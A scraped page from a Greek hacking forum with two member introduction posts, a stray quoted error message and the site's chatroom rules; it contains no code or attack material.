ΚΑΙ ΘΑ ΣΑΣ ΠΕΤΑΞΕΙ ΑΥΤΟ ΤΟ ΜΗΝΥΜΑ: "Error: Could not find the HOST. (Check your internet connection or your input is wrong)"
  10. Καλημέρα ή Καλησπέρα σε όλους... Αναλόγως τι ώρα θα δει κάποιος το θέμα, αν το δει τελικά και δεν με γράψει. Δεκτοί και αυτοί που βλέπουν την μέρα, νύχτα και το αντίστροφο. Γειά και σε αυτούς που ο χρόνος έχει σταματήσει στα μαύρα μεσάνυχτα. Βρέθηκα εδώ εντελώς τυχαία και είπα να μπω, καθώς φάνηκε πολύ ενδιαφέρον.\ Ελπίζω να μην έπεσα σε πάρτι με ούζα ή τρενάκι. Θέλω να προσφέρω και βέβαια να μάθω και να πάρω, όσα περισσότερα γίνεται. Είμαι νεούδι ακόμα, οπότε θα κάνω πολλές ερωτήσεις εν πορεία. Το φόρουμ είναι πάρα πολύ ωραίο και όπως φαίνεται, θα είναι πολύ ενδιαφέρουσα εμπειρία το σερφάρισμα σε αυτό. Καλή μου συνέχεια λοιπόν... (!) Δύο πράγματα που θέλω να προτείνω είναι, όταν κάποιος βάζει ένα θέμα στο Beginners Hacking 1. να είναι αρκετά περιγραφικός και 2. να εξηγεί ακριβώς όπως θα τα εξηγούσε σε έναν έφηβο ή σε έναν που δεν έχει ιδέα στο αντικείμενο.
  11. Καλησπέρα σας λοιπόν και από εμένα, με λένε Ραφαήλ είμαι 25 ετών και είμαι από την όμορφη Ρόδο. Ήμουν παλιός χρήστης σε αυτό το φόρουμ πριν ο πρώην διαχειριστής το πουλήσει. Σας εύχομαι καλή αρχή.!!! Με εκτίμηση και σεβασμό στο πρόσωπον σας. Ραφαήλ/DarkCore

ChatBox

ChatBox

Chatroom Rules

  • Το GreekHacking.Gr είναι ένα ελληνικό forum και επιτρέπεται μόνο η χρήση της Ελληνική Γλώσσας (ούτε greeklish).
  • Δεν επιτρέπονται οι βρισιές και γενικά η χρήση χυδαίας γλώσσας.
  • Απαγορεύεται αυστηρά το πορνογραφικό, προσβλητικό και βίαιο περιεχόμενο.
  • Μην χρησιμοποιείτε κεφαλαία γράμματα η σύμβολα.
×
×
  • Create New...